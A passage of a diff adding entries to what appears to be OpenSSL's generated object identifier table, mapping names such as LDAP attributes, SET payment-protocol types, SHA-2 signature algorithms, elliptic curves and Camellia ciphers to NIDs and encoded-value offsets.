+{"documentLocation","documentLocation",NID_documentLocation,10,
+	&(lvalues[3534]),0},
+{"homeTelephoneNumber","homeTelephoneNumber",NID_homeTelephoneNumber,
+	10,&(lvalues[3544]),0},
+{"secretary","secretary",NID_secretary,10,&(lvalues[3554]),0},
+{"otherMailbox","otherMailbox",NID_otherMailbox,10,&(lvalues[3564]),0},
+{"lastModifiedTime","lastModifiedTime",NID_lastModifiedTime,10,
+	&(lvalues[3574]),0},
+{"lastModifiedBy","lastModifiedBy",NID_lastModifiedBy,10,
+	&(lvalues[3584]),0},
+{"aRecord","aRecord",NID_aRecord,10,&(lvalues[3594]),0},
+{"pilotAttributeType27","pilotAttributeType27",
+	NID_pilotAttributeType27,10,&(lvalues[3604]),0},
+{"mXRecord","mXRecord",NID_mXRecord,10,&(lvalues[3614]),0},
+{"nSRecord","nSRecord",NID_nSRecord,10,&(lvalues[3624]),0},
+{"sOARecord","sOARecord",NID_sOARecord,10,&(lvalues[3634]),0},
+{"cNAMERecord","cNAMERecord",NID_cNAMERecord,10,&(lvalues[3644]),0},
+{"associatedDomain","associatedDomain",NID_associatedDomain,10,
+	&(lvalues[3654]),0},
+{"associatedName","associatedName",NID_associatedName,10,
+	&(lvalues[3664]),0},
+{"homePostalAddress","homePostalAddress",NID_homePostalAddress,10,
+	&(lvalues[3674]),0},
+{"personalTitle","personalTitle",NID_personalTitle,10,&(lvalues[3684]),0},
+{"mobileTelephoneNumber","mobileTelephoneNumber",
+	NID_mobileTelephoneNumber,10,&(lvalues[3694]),0},
+{"pagerTelephoneNumber","pagerTelephoneNumber",
+	NID_pagerTelephoneNumber,10,&(lvalues[3704]),0},
+{"friendlyCountryName","friendlyCountryName",NID_friendlyCountryName,
+	10,&(lvalues[3714]),0},
+{"organizationalStatus","organizationalStatus",
+	NID_organizationalStatus,10,&(lvalues[3724]),0},
+{"janetMailbox","janetMailbox",NID_janetMailbox,10,&(lvalues[3734]),0},
+{"mailPreferenceOption","mailPreferenceOption",
+	NID_mailPreferenceOption,10,&(lvalues[3744]),0},
+{"buildingName","buildingName",NID_buildingName,10,&(lvalues[3754]),0},
+{"dSAQuality","dSAQuality",NID_dSAQuality,10,&(lvalues[3764]),0},
+{"singleLevelQuality","singleLevelQuality",NID_singleLevelQuality,10,
+	&(lvalues[3774]),0},
+{"subtreeMinimumQuality","subtreeMinimumQuality",
+	NID_subtreeMinimumQuality,10,&(lvalues[3784]),0},
+{"subtreeMaximumQuality","subtreeMaximumQuality",
+	NID_subtreeMaximumQuality,10,&(lvalues[3794]),0},
+{"personalSignature","personalSignature",NID_personalSignature,10,
+	&(lvalues[3804]),0},
+{"dITRedirect","dITRedirect",NID_dITRedirect,10,&(lvalues[3814]),0},
+{"audio","audio",NID_audio,10,&(lvalues[3824]),0},
+{"documentPublisher","documentPublisher",NID_documentPublisher,10,
+	&(lvalues[3834]),0},
+{"x500UniqueIdentifier","x500UniqueIdentifier",
+	NID_x500UniqueIdentifier,3,&(lvalues[3844]),0},
+{"mime-mhs","MIME MHS",NID_mime_mhs,5,&(lvalues[3847]),0},
+{"mime-mhs-headings","mime-mhs-headings",NID_mime_mhs_headings,6,
+	&(lvalues[3852]),0},
+{"mime-mhs-bodies","mime-mhs-bodies",NID_mime_mhs_bodies,6,
+	&(lvalues[3858]),0},
+{"id-hex-partial-message","id-hex-partial-message",
+	NID_id_hex_partial_message,7,&(lvalues[3864]),0},
+{"id-hex-multipart-message","id-hex-multipart-message",
+	NID_id_hex_multipart_message,7,&(lvalues[3871]),0},
+{"generationQualifier","generationQualifier",NID_generationQualifier,
+	3,&(lvalues[3878]),0},
+{"pseudonym","pseudonym",NID_pseudonym,3,&(lvalues[3881]),0},
+{NULL,NULL,NID_undef,0,NULL,0},
+{"id-set","Secure Electronic Transactions",NID_id_set,2,
+	&(lvalues[3884]),0},
+{"set-ctype","content types",NID_set_ctype,3,&(lvalues[3886]),0},
+{"set-msgExt","message extensions",NID_set_msgExt,3,&(lvalues[3889]),0},
+{"set-attr","set-attr",NID_set_attr,3,&(lvalues[3892]),0},
+{"set-policy","set-policy",NID_set_policy,3,&(lvalues[3895]),0},
+{"set-certExt","certificate extensions",NID_set_certExt,3,
+	&(lvalues[3898]),0},
+{"set-brand","set-brand",NID_set_brand,3,&(lvalues[3901]),0},
+{"setct-PANData","setct-PANData",NID_setct_PANData,4,&(lvalues[3904]),0},
+{"setct-PANToken","setct-PANToken",NID_setct_PANToken,4,
+	&(lvalues[3908]),0},
+{"setct-PANOnly","setct-PANOnly",NID_setct_PANOnly,4,&(lvalues[3912]),0},
+{"setct-OIData","setct-OIData",NID_setct_OIData,4,&(lvalues[3916]),0},
+{"setct-PI","setct-PI",NID_setct_PI,4,&(lvalues[3920]),0},
+{"setct-PIData","setct-PIData",NID_setct_PIData,4,&(lvalues[3924]),0},
+{"setct-PIDataUnsigned","setct-PIDataUnsigned",
+	NID_setct_PIDataUnsigned,4,&(lvalues[3928]),0},
+{"setct-HODInput","setct-HODInput",NID_setct_HODInput,4,
+	&(lvalues[3932]),0},
+{"setct-AuthResBaggage","setct-AuthResBaggage",
+	NID_setct_AuthResBaggage,4,&(lvalues[3936]),0},
+{"setct-AuthRevReqBaggage","setct-AuthRevReqBaggage",
+	NID_setct_AuthRevReqBaggage,4,&(lvalues[3940]),0},
+{"setct-AuthRevResBaggage","setct-AuthRevResBaggage",
+	NID_setct_AuthRevResBaggage,4,&(lvalues[3944]),0},
+{"setct-CapTokenSeq","setct-CapTokenSeq",NID_setct_CapTokenSeq,4,
+	&(lvalues[3948]),0},
+{"setct-PInitResData","setct-PInitResData",NID_setct_PInitResData,4,
+	&(lvalues[3952]),0},
+{"setct-PI-TBS","setct-PI-TBS",NID_setct_PI_TBS,4,&(lvalues[3956]),0},
+{"setct-PResData","setct-PResData",NID_setct_PResData,4,
+	&(lvalues[3960]),0},
+{"setct-AuthReqTBS","setct-AuthReqTBS",NID_setct_AuthReqTBS,4,
+	&(lvalues[3964]),0},
+{"setct-AuthResTBS","setct-AuthResTBS",NID_setct_AuthResTBS,4,
+	&(lvalues[3968]),0},
+{"setct-AuthResTBSX","setct-AuthResTBSX",NID_setct_AuthResTBSX,4,
+	&(lvalues[3972]),0},
+{"setct-AuthTokenTBS","setct-AuthTokenTBS",NID_setct_AuthTokenTBS,4,
+	&(lvalues[3976]),0},
+{"setct-CapTokenData","setct-CapTokenData",NID_setct_CapTokenData,4,
+	&(lvalues[3980]),0},
+{"setct-CapTokenTBS","setct-CapTokenTBS",NID_setct_CapTokenTBS,4,
+	&(lvalues[3984]),0},
+{"setct-AcqCardCodeMsg","setct-AcqCardCodeMsg",
+	NID_setct_AcqCardCodeMsg,4,&(lvalues[3988]),0},
+{"setct-AuthRevReqTBS","setct-AuthRevReqTBS",NID_setct_AuthRevReqTBS,
+	4,&(lvalues[3992]),0},
+{"setct-AuthRevResData","setct-AuthRevResData",
+	NID_setct_AuthRevResData,4,&(lvalues[3996]),0},
+{"setct-AuthRevResTBS","setct-AuthRevResTBS",NID_setct_AuthRevResTBS,
+	4,&(lvalues[4000]),0},
+{"setct-CapReqTBS","setct-CapReqTBS",NID_setct_CapReqTBS,4,
+	&(lvalues[4004]),0},
+{"setct-CapReqTBSX","setct-CapReqTBSX",NID_setct_CapReqTBSX,4,
+	&(lvalues[4008]),0},
+{"setct-CapResData","setct-CapResData",NID_setct_CapResData,4,
+	&(lvalues[4012]),0},
+{"setct-CapRevReqTBS","setct-CapRevReqTBS",NID_setct_CapRevReqTBS,4,
+	&(lvalues[4016]),0},
+{"setct-CapRevReqTBSX","setct-CapRevReqTBSX",NID_setct_CapRevReqTBSX,
+	4,&(lvalues[4020]),0},
+{"setct-CapRevResData","setct-CapRevResData",NID_setct_CapRevResData,
+	4,&(lvalues[4024]),0},
+{"setct-CredReqTBS","setct-CredReqTBS",NID_setct_CredReqTBS,4,
+	&(lvalues[4028]),0},
+{"setct-CredReqTBSX","setct-CredReqTBSX",NID_setct_CredReqTBSX,4,
+	&(lvalues[4032]),0},
+{"setct-CredResData","setct-CredResData",NID_setct_CredResData,4,
+	&(lvalues[4036]),0},
+{"setct-CredRevReqTBS","setct-CredRevReqTBS",NID_setct_CredRevReqTBS,
+	4,&(lvalues[4040]),0},
+{"setct-CredRevReqTBSX","setct-CredRevReqTBSX",
+	NID_setct_CredRevReqTBSX,4,&(lvalues[4044]),0},
+{"setct-CredRevResData","setct-CredRevResData",
+	NID_setct_CredRevResData,4,&(lvalues[4048]),0},
+{"setct-PCertReqData","setct-PCertReqData",NID_setct_PCertReqData,4,
+	&(lvalues[4052]),0},
+{"setct-PCertResTBS","setct-PCertResTBS",NID_setct_PCertResTBS,4,
+	&(lvalues[4056]),0},
+{"setct-BatchAdminReqData","setct-BatchAdminReqData",
+	NID_setct_BatchAdminReqData,4,&(lvalues[4060]),0},
+{"setct-BatchAdminResData","setct-BatchAdminResData",
+	NID_setct_BatchAdminResData,4,&(lvalues[4064]),0},
+{"setct-CardCInitResTBS","setct-CardCInitResTBS",
+	NID_setct_CardCInitResTBS,4,&(lvalues[4068]),0},
+{"setct-MeAqCInitResTBS","setct-MeAqCInitResTBS",
+	NID_setct_MeAqCInitResTBS,4,&(lvalues[4072]),0},
+{"setct-RegFormResTBS","setct-RegFormResTBS",NID_setct_RegFormResTBS,
+	4,&(lvalues[4076]),0},
+{"setct-CertReqData","setct-CertReqData",NID_setct_CertReqData,4,
+	&(lvalues[4080]),0},
+{"setct-CertReqTBS","setct-CertReqTBS",NID_setct_CertReqTBS,4,
+	&(lvalues[4084]),0},
+{"setct-CertResData","setct-CertResData",NID_setct_CertResData,4,
+	&(lvalues[4088]),0},
+{"setct-CertInqReqTBS","setct-CertInqReqTBS",NID_setct_CertInqReqTBS,
+	4,&(lvalues[4092]),0},
+{"setct-ErrorTBS","setct-ErrorTBS",NID_setct_ErrorTBS,4,
+	&(lvalues[4096]),0},
+{"setct-PIDualSignedTBE","setct-PIDualSignedTBE",
+	NID_setct_PIDualSignedTBE,4,&(lvalues[4100]),0},
+{"setct-PIUnsignedTBE","setct-PIUnsignedTBE",NID_setct_PIUnsignedTBE,
+	4,&(lvalues[4104]),0},
+{"setct-AuthReqTBE","setct-AuthReqTBE",NID_setct_AuthReqTBE,4,
+	&(lvalues[4108]),0},
+{"setct-AuthResTBE","setct-AuthResTBE",NID_setct_AuthResTBE,4,
+	&(lvalues[4112]),0},
+{"setct-AuthResTBEX","setct-AuthResTBEX",NID_setct_AuthResTBEX,4,
+	&(lvalues[4116]),0},
+{"setct-AuthTokenTBE","setct-AuthTokenTBE",NID_setct_AuthTokenTBE,4,
+	&(lvalues[4120]),0},
+{"setct-CapTokenTBE","setct-CapTokenTBE",NID_setct_CapTokenTBE,4,
+	&(lvalues[4124]),0},
+{"setct-CapTokenTBEX","setct-CapTokenTBEX",NID_setct_CapTokenTBEX,4,
+	&(lvalues[4128]),0},
+{"setct-AcqCardCodeMsgTBE","setct-AcqCardCodeMsgTBE",
+	NID_setct_AcqCardCodeMsgTBE,4,&(lvalues[4132]),0},
+{"setct-AuthRevReqTBE","setct-AuthRevReqTBE",NID_setct_AuthRevReqTBE,
+	4,&(lvalues[4136]),0},
+{"setct-AuthRevResTBE","setct-AuthRevResTBE",NID_setct_AuthRevResTBE,
+	4,&(lvalues[4140]),0},
+{"setct-AuthRevResTBEB","setct-AuthRevResTBEB",
+	NID_setct_AuthRevResTBEB,4,&(lvalues[4144]),0},
+{"setct-CapReqTBE","setct-CapReqTBE",NID_setct_CapReqTBE,4,
+	&(lvalues[4148]),0},
+{"setct-CapReqTBEX","setct-CapReqTBEX",NID_setct_CapReqTBEX,4,
+	&(lvalues[4152]),0},
+{"setct-CapResTBE","setct-CapResTBE",NID_setct_CapResTBE,4,
+	&(lvalues[4156]),0},
+{"setct-CapRevReqTBE","setct-CapRevReqTBE",NID_setct_CapRevReqTBE,4,
+	&(lvalues[4160]),0},
+{"setct-CapRevReqTBEX","setct-CapRevReqTBEX",NID_setct_CapRevReqTBEX,
+	4,&(lvalues[4164]),0},
+{"setct-CapRevResTBE","setct-CapRevResTBE",NID_setct_CapRevResTBE,4,
+	&(lvalues[4168]),0},
+{"setct-CredReqTBE","setct-CredReqTBE",NID_setct_CredReqTBE,4,
+	&(lvalues[4172]),0},
+{"setct-CredReqTBEX","setct-CredReqTBEX",NID_setct_CredReqTBEX,4,
+	&(lvalues[4176]),0},
+{"setct-CredResTBE","setct-CredResTBE",NID_setct_CredResTBE,4,
+	&(lvalues[4180]),0},
+{"setct-CredRevReqTBE","setct-CredRevReqTBE",NID_setct_CredRevReqTBE,
+	4,&(lvalues[4184]),0},
+{"setct-CredRevReqTBEX","setct-CredRevReqTBEX",
+	NID_setct_CredRevReqTBEX,4,&(lvalues[4188]),0},
+{"setct-CredRevResTBE","setct-CredRevResTBE",NID_setct_CredRevResTBE,
+	4,&(lvalues[4192]),0},
+{"setct-BatchAdminReqTBE","setct-BatchAdminReqTBE",
+	NID_setct_BatchAdminReqTBE,4,&(lvalues[4196]),0},
+{"setct-BatchAdminResTBE","setct-BatchAdminResTBE",
+	NID_setct_BatchAdminResTBE,4,&(lvalues[4200]),0},
+{"setct-RegFormReqTBE","setct-RegFormReqTBE",NID_setct_RegFormReqTBE,
+	4,&(lvalues[4204]),0},
+{"setct-CertReqTBE","setct-CertReqTBE",NID_setct_CertReqTBE,4,
+	&(lvalues[4208]),0},
+{"setct-CertReqTBEX","setct-CertReqTBEX",NID_setct_CertReqTBEX,4,
+	&(lvalues[4212]),0},
+{"setct-CertResTBE","setct-CertResTBE",NID_setct_CertResTBE,4,
+	&(lvalues[4216]),0},
+{"setct-CRLNotificationTBS","setct-CRLNotificationTBS",
+	NID_setct_CRLNotificationTBS,4,&(lvalues[4220]),0},
+{"setct-CRLNotificationResTBS","setct-CRLNotificationResTBS",
+	NID_setct_CRLNotificationResTBS,4,&(lvalues[4224]),0},
+{"setct-BCIDistributionTBS","setct-BCIDistributionTBS",
+	NID_setct_BCIDistributionTBS,4,&(lvalues[4228]),0},
+{"setext-genCrypt","generic cryptogram",NID_setext_genCrypt,4,
+	&(lvalues[4232]),0},
+{"setext-miAuth","merchant initiated auth",NID_setext_miAuth,4,
+	&(lvalues[4236]),0},
+{"setext-pinSecure","setext-pinSecure",NID_setext_pinSecure,4,
+	&(lvalues[4240]),0},
+{"setext-pinAny","setext-pinAny",NID_setext_pinAny,4,&(lvalues[4244]),0},
+{"setext-track2","setext-track2",NID_setext_track2,4,&(lvalues[4248]),0},
+{"setext-cv","additional verification",NID_setext_cv,4,
+	&(lvalues[4252]),0},
+{"set-policy-root","set-policy-root",NID_set_policy_root,4,
+	&(lvalues[4256]),0},
+{"setCext-hashedRoot","setCext-hashedRoot",NID_setCext_hashedRoot,4,
+	&(lvalues[4260]),0},
+{"setCext-certType","setCext-certType",NID_setCext_certType,4,
+	&(lvalues[4264]),0},
+{"setCext-merchData","setCext-merchData",NID_setCext_merchData,4,
+	&(lvalues[4268]),0},
+{"setCext-cCertRequired","setCext-cCertRequired",
+	NID_setCext_cCertRequired,4,&(lvalues[4272]),0},
+{"setCext-tunneling","setCext-tunneling",NID_setCext_tunneling,4,
+	&(lvalues[4276]),0},
+{"setCext-setExt","setCext-setExt",NID_setCext_setExt,4,
+	&(lvalues[4280]),0},
+{"setCext-setQualf","setCext-setQualf",NID_setCext_setQualf,4,
+	&(lvalues[4284]),0},
+{"setCext-PGWYcapabilities","setCext-PGWYcapabilities",
+	NID_setCext_PGWYcapabilities,4,&(lvalues[4288]),0},
+{"setCext-TokenIdentifier","setCext-TokenIdentifier",
+	NID_setCext_TokenIdentifier,4,&(lvalues[4292]),0},
+{"setCext-Track2Data","setCext-Track2Data",NID_setCext_Track2Data,4,
+	&(lvalues[4296]),0},
+{"setCext-TokenType","setCext-TokenType",NID_setCext_TokenType,4,
+	&(lvalues[4300]),0},
+{"setCext-IssuerCapabilities","setCext-IssuerCapabilities",
+	NID_setCext_IssuerCapabilities,4,&(lvalues[4304]),0},
+{"setAttr-Cert","setAttr-Cert",NID_setAttr_Cert,4,&(lvalues[4308]),0},
+{"setAttr-PGWYcap","payment gateway capabilities",NID_setAttr_PGWYcap,
+	4,&(lvalues[4312]),0},
+{"setAttr-TokenType","setAttr-TokenType",NID_setAttr_TokenType,4,
+	&(lvalues[4316]),0},
+{"setAttr-IssCap","issuer capabilities",NID_setAttr_IssCap,4,
+	&(lvalues[4320]),0},
+{"set-rootKeyThumb","set-rootKeyThumb",NID_set_rootKeyThumb,5,
+	&(lvalues[4324]),0},
+{"set-addPolicy","set-addPolicy",NID_set_addPolicy,5,&(lvalues[4329]),0},
+{"setAttr-Token-EMV","setAttr-Token-EMV",NID_setAttr_Token_EMV,5,
+	&(lvalues[4334]),0},
+{"setAttr-Token-B0Prime","setAttr-Token-B0Prime",
+	NID_setAttr_Token_B0Prime,5,&(lvalues[4339]),0},
+{"setAttr-IssCap-CVM","setAttr-IssCap-CVM",NID_setAttr_IssCap_CVM,5,
+	&(lvalues[4344]),0},
+{"setAttr-IssCap-T2","setAttr-IssCap-T2",NID_setAttr_IssCap_T2,5,
+	&(lvalues[4349]),0},
+{"setAttr-IssCap-Sig","setAttr-IssCap-Sig",NID_setAttr_IssCap_Sig,5,
+	&(lvalues[4354]),0},
+{"setAttr-GenCryptgrm","generate cryptogram",NID_setAttr_GenCryptgrm,
+	6,&(lvalues[4359]),0},
+{"setAttr-T2Enc","encrypted track 2",NID_setAttr_T2Enc,6,
+	&(lvalues[4365]),0},
+{"setAttr-T2cleartxt","cleartext track 2",NID_setAttr_T2cleartxt,6,
+	&(lvalues[4371]),0},
+{"setAttr-TokICCsig","ICC or token signature",NID_setAttr_TokICCsig,6,
+	&(lvalues[4377]),0},
+{"setAttr-SecDevSig","secure device signature",NID_setAttr_SecDevSig,
+	6,&(lvalues[4383]),0},
+{"set-brand-IATA-ATA","set-brand-IATA-ATA",NID_set_brand_IATA_ATA,4,
+	&(lvalues[4389]),0},
+{"set-brand-Diners","set-brand-Diners",NID_set_brand_Diners,4,
+	&(lvalues[4393]),0},
+{"set-brand-AmericanExpress","set-brand-AmericanExpress",
+	NID_set_brand_AmericanExpress,4,&(lvalues[4397]),0},
+{"set-brand-JCB","set-brand-JCB",NID_set_brand_JCB,4,&(lvalues[4401]),0},
+{"set-brand-Visa","set-brand-Visa",NID_set_brand_Visa,4,
+	&(lvalues[4405]),0},
+{"set-brand-MasterCard","set-brand-MasterCard",
+	NID_set_brand_MasterCard,4,&(lvalues[4409]),0},
+{"set-brand-Novus","set-brand-Novus",NID_set_brand_Novus,5,
+	&(lvalues[4413]),0},
+{"DES-CDMF","des-cdmf",NID_des_cdmf,8,&(lvalues[4418]),0},
+{"rsaOAEPEncryptionSET","rsaOAEPEncryptionSET",
+	NID_rsaOAEPEncryptionSET,9,&(lvalues[4426]),0},
+{"ITU-T","itu-t",NID_itu_t,0,NULL,0},
+{"JOINT-ISO-ITU-T","joint-iso-itu-t",NID_joint_iso_itu_t,0,NULL,0},
+{"international-organizations","International Organizations",
+	NID_international_organizations,1,&(lvalues[4435]),0},
+{"msSmartcardLogin","Microsoft Smartcardlogin",NID_ms_smartcard_login,
+	10,&(lvalues[4436]),0},
+{"msUPN","Microsoft Universal Principal Name",NID_ms_upn,10,
+	&(lvalues[4446]),0},
+{"AES-128-CFB1","aes-128-cfb1",NID_aes_128_cfb1,0,NULL,0},
+{"AES-192-CFB1","aes-192-cfb1",NID_aes_192_cfb1,0,NULL,0},
+{"AES-256-CFB1","aes-256-cfb1",NID_aes_256_cfb1,0,NULL,0},
+{"AES-128-CFB8","aes-128-cfb8",NID_aes_128_cfb8,0,NULL,0},
+{"AES-192-CFB8","aes-192-cfb8",NID_aes_192_cfb8,0,NULL,0},
+{"AES-256-CFB8","aes-256-cfb8",NID_aes_256_cfb8,0,NULL,0},
+{"DES-CFB1","des-cfb1",NID_des_cfb1,0,NULL,0},
+{"DES-CFB8","des-cfb8",NID_des_cfb8,0,NULL,0},
+{"DES-EDE3-CFB1","des-ede3-cfb1",NID_des_ede3_cfb1,0,NULL,0},
+{"DES-EDE3-CFB8","des-ede3-cfb8",NID_des_ede3_cfb8,0,NULL,0},
+{"street","streetAddress",NID_streetAddress,3,&(lvalues[4456]),0},
+{"postalCode","postalCode",NID_postalCode,3,&(lvalues[4459]),0},
+{"id-ppl","id-ppl",NID_id_ppl,7,&(lvalues[4462]),0},
+{"proxyCertInfo","Proxy Certificate Information",NID_proxyCertInfo,8,
+	&(lvalues[4469]),0},
+{"id-ppl-anyLanguage","Any language",NID_id_ppl_anyLanguage,8,
+	&(lvalues[4477]),0},
+{"id-ppl-inheritAll","Inherit all",NID_id_ppl_inheritAll,8,
+	&(lvalues[4485]),0},
+{"nameConstraints","X509v3 Name Constraints",NID_name_constraints,3,
+	&(lvalues[4493]),0},
+{"id-ppl-independent","Independent",NID_Independent,8,&(lvalues[4496]),0},
+{"RSA-SHA256","sha256WithRSAEncryption",NID_sha256WithRSAEncryption,9,
+	&(lvalues[4504]),0},
+{"RSA-SHA384","sha384WithRSAEncryption",NID_sha384WithRSAEncryption,9,
+	&(lvalues[4513]),0},
+{"RSA-SHA512","sha512WithRSAEncryption",NID_sha512WithRSAEncryption,9,
+	&(lvalues[4522]),0},
+{"RSA-SHA224","sha224WithRSAEncryption",NID_sha224WithRSAEncryption,9,
+	&(lvalues[4531]),0},
+{"SHA256","sha256",NID_sha256,9,&(lvalues[4540]),0},
+{"SHA384","sha384",NID_sha384,9,&(lvalues[4549]),0},
+{"SHA512","sha512",NID_sha512,9,&(lvalues[4558]),0},
+{"SHA224","sha224",NID_sha224,9,&(lvalues[4567]),0},
+{"identified-organization","identified-organization",
+	NID_identified_organization,1,&(lvalues[4576]),0},
+{"certicom-arc","certicom-arc",NID_certicom_arc,3,&(lvalues[4577]),0},
+{"wap","wap",NID_wap,2,&(lvalues[4580]),0},
+{"wap-wsg","wap-wsg",NID_wap_wsg,3,&(lvalues[4582]),0},
+{"id-characteristic-two-basis","id-characteristic-two-basis",
+	NID_X9_62_id_characteristic_two_basis,8,&(lvalues[4585]),0},
+{"onBasis","onBasis",NID_X9_62_onBasis,9,&(lvalues[4593]),0},
+{"tpBasis","tpBasis",NID_X9_62_tpBasis,9,&(lvalues[4602]),0},
+{"ppBasis","ppBasis",NID_X9_62_ppBasis,9,&(lvalues[4611]),0},
+{"c2pnb163v1","c2pnb163v1",NID_X9_62_c2pnb163v1,8,&(lvalues[4620]),0},
+{"c2pnb163v2","c2pnb163v2",NID_X9_62_c2pnb163v2,8,&(lvalues[4628]),0},
+{"c2pnb163v3","c2pnb163v3",NID_X9_62_c2pnb163v3,8,&(lvalues[4636]),0},
+{"c2pnb176v1","c2pnb176v1",NID_X9_62_c2pnb176v1,8,&(lvalues[4644]),0},
+{"c2tnb191v1","c2tnb191v1",NID_X9_62_c2tnb191v1,8,&(lvalues[4652]),0},
+{"c2tnb191v2","c2tnb191v2",NID_X9_62_c2tnb191v2,8,&(lvalues[4660]),0},
+{"c2tnb191v3","c2tnb191v3",NID_X9_62_c2tnb191v3,8,&(lvalues[4668]),0},
+{"c2onb191v4","c2onb191v4",NID_X9_62_c2onb191v4,8,&(lvalues[4676]),0},
+{"c2onb191v5","c2onb191v5",NID_X9_62_c2onb191v5,8,&(lvalues[4684]),0},
+{"c2pnb208w1","c2pnb208w1",NID_X9_62_c2pnb208w1,8,&(lvalues[4692]),0},
+{"c2tnb239v1","c2tnb239v1",NID_X9_62_c2tnb239v1,8,&(lvalues[4700]),0},
+{"c2tnb239v2","c2tnb239v2",NID_X9_62_c2tnb239v2,8,&(lvalues[4708]),0},
+{"c2tnb239v3","c2tnb239v3",NID_X9_62_c2tnb239v3,8,&(lvalues[4716]),0},
+{"c2onb239v4","c2onb239v4",NID_X9_62_c2onb239v4,8,&(lvalues[4724]),0},
+{"c2onb239v5","c2onb239v5",NID_X9_62_c2onb239v5,8,&(lvalues[4732]),0},
+{"c2pnb272w1","c2pnb272w1",NID_X9_62_c2pnb272w1,8,&(lvalues[4740]),0},
+{"c2pnb304w1","c2pnb304w1",NID_X9_62_c2pnb304w1,8,&(lvalues[4748]),0},
+{"c2tnb359v1","c2tnb359v1",NID_X9_62_c2tnb359v1,8,&(lvalues[4756]),0},
+{"c2pnb368w1","c2pnb368w1",NID_X9_62_c2pnb368w1,8,&(lvalues[4764]),0},
+{"c2tnb431r1","c2tnb431r1",NID_X9_62_c2tnb431r1,8,&(lvalues[4772]),0},
+{"secp112r1","secp112r1",NID_secp112r1,5,&(lvalues[4780]),0},
+{"secp112r2","secp112r2",NID_secp112r2,5,&(lvalues[4785]),0},
+{"secp128r1","secp128r1",NID_secp128r1,5,&(lvalues[4790]),0},
+{"secp128r2","secp128r2",NID_secp128r2,5,&(lvalues[4795]),0},
+{"secp160k1","secp160k1",NID_secp160k1,5,&(lvalues[4800]),0},
+{"secp160r1","secp160r1",NID_secp160r1,5,&(lvalues[4805]),0},
+{"secp160r2","secp160r2",NID_secp160r2,5,&(lvalues[4810]),0},
+{"secp192k1","secp192k1",NID_secp192k1,5,&(lvalues[4815]),0},
+{"secp224k1","secp224k1",NID_secp224k1,5,&(lvalues[4820]),0},
+{"secp224r1","secp224r1",NID_secp224r1,5,&(lvalues[4825]),0},
+{"secp256k1","secp256k1",NID_secp256k1,5,&(lvalues[4830]),0},
+{"secp384r1","secp384r1",NID_secp384r1,5,&(lvalues[4835]),0},
+{"secp521r1","secp521r1",NID_secp521r1,5,&(lvalues[4840]),0},
+{"sect113r1","sect113r1",NID_sect113r1,5,&(lvalues[4845]),0},
+{"sect113r2","sect113r2",NID_sect113r2,5,&(lvalues[4850]),0},
+{"sect131r1","sect131r1",NID_sect131r1,5,&(lvalues[4855]),0},
+{"sect131r2","sect131r2",NID_sect131r2,5,&(lvalues[4860]),0},
+{"sect163k1","sect163k1",NID_sect163k1,5,&(lvalues[4865]),0},
+{"sect163r1","sect163r1",NID_sect163r1,5,&(lvalues[4870]),0},
+{"sect163r2","sect163r2",NID_sect163r2,5,&(lvalues[4875]),0},
+{"sect193r1","sect193r1",NID_sect193r1,5,&(lvalues[4880]),0},
+{"sect193r2","sect193r2",NID_sect193r2,5,&(lvalues[4885]),0},
+{"sect233k1","sect233k1",NID_sect233k1,5,&(lvalues[4890]),0},
+{"sect233r1","sect233r1",NID_sect233r1,5,&(lvalues[4895]),0},
+{"sect239k1","sect239k1",NID_sect239k1,5,&(lvalues[4900]),0},
+{"sect283k1","sect283k1",NID_sect283k1,5,&(lvalues[4905]),0},
+{"sect283r1","sect283r1",NID_sect283r1,5,&(lvalues[4910]),0},
+{"sect409k1","sect409k1",NID_sect409k1,5,&(lvalues[4915]),0},
+{"sect409r1","sect409r1",NID_sect409r1,5,&(lvalues[4920]),0},
+{"sect571k1","sect571k1",NID_sect571k1,5,&(lvalues[4925]),0},
+{"sect571r1","sect571r1",NID_sect571r1,5,&(lvalues[4930]),0},
+{"wap-wsg-idm-ecid-wtls1","wap-wsg-idm-ecid-wtls1",
+	NID_wap_wsg_idm_ecid_wtls1,5,&(lvalues[4935]),0},
+{"wap-wsg-idm-ecid-wtls3","wap-wsg-idm-ecid-wtls3",
+	NID_wap_wsg_idm_ecid_wtls3,5,&(lvalues[4940]),0},
+{"wap-wsg-idm-ecid-wtls4","wap-wsg-idm-ecid-wtls4",
+	NID_wap_wsg_idm_ecid_wtls4,5,&(lvalues[4945]),0},
+{"wap-wsg-idm-ecid-wtls5","wap-wsg-idm-ecid-wtls5",
+	NID_wap_wsg_idm_ecid_wtls5,5,&(lvalues[4950]),0},
+{"wap-wsg-idm-ecid-wtls6","wap-wsg-idm-ecid-wtls6",
+	NID_wap_wsg_idm_ecid_wtls6,5,&(lvalues[4955]),0},
+{"wap-wsg-idm-ecid-wtls7","wap-wsg-idm-ecid-wtls7",
+	NID_wap_wsg_idm_ecid_wtls7,5,&(lvalues[4960]),0},
+{"wap-wsg-idm-ecid-wtls8","wap-wsg-idm-ecid-wtls8",
+	NID_wap_wsg_idm_ecid_wtls8,5,&(lvalues[4965]),0},
+{"wap-wsg-idm-ecid-wtls9","wap-wsg-idm-ecid-wtls9",
+	NID_wap_wsg_idm_ecid_wtls9,5,&(lvalues[4970]),0},
+{"wap-wsg-idm-ecid-wtls10","wap-wsg-idm-ecid-wtls10",
+	NID_wap_wsg_idm_ecid_wtls10,5,&(lvalues[4975]),0},
+{"wap-wsg-idm-ecid-wtls11","wap-wsg-idm-ecid-wtls11",
+	NID_wap_wsg_idm_ecid_wtls11,5,&(lvalues[4980]),0},
+{"wap-wsg-idm-ecid-wtls12","wap-wsg-idm-ecid-wtls12",
+	NID_wap_wsg_idm_ecid_wtls12,5,&(lvalues[4985]),0},
+{"anyPolicy","X509v3 Any Policy",NID_any_policy,4,&(lvalues[4990]),0},
+{"policyMappings","X509v3 Policy Mappings",NID_policy_mappings,3,
+	&(lvalues[4994]),0},
+{"inhibitAnyPolicy","X509v3 Inhibit Any Policy",
+	NID_inhibit_any_policy,3,&(lvalues[4997]),0},
+{"Oakley-EC2N-3","ipsec3",NID_ipsec3,0,NULL,0},
+{"Oakley-EC2N-4","ipsec4",NID_ipsec4,0,NULL,0},
+{"CAMELLIA-128-CBC","camellia-128-cbc",NID_camellia_128_cbc,11,
+	&(lvalues[5000]),0},
+{"CAMELLIA-192-CBC","camellia-192-cbc",NID_camellia_192_cbc,11,
+	&(lvalues[5011]),0},
+{"CAMELLIA-256-CBC","camellia-256-cbc",NID_camellia_256_cbc,11,
+	&(lvalues[5022]),0},
+{"CAMELLIA-128-ECB","camellia-128-ecb",NID_camellia_128_ecb,8,
+	&(lvalues[5033]),0},
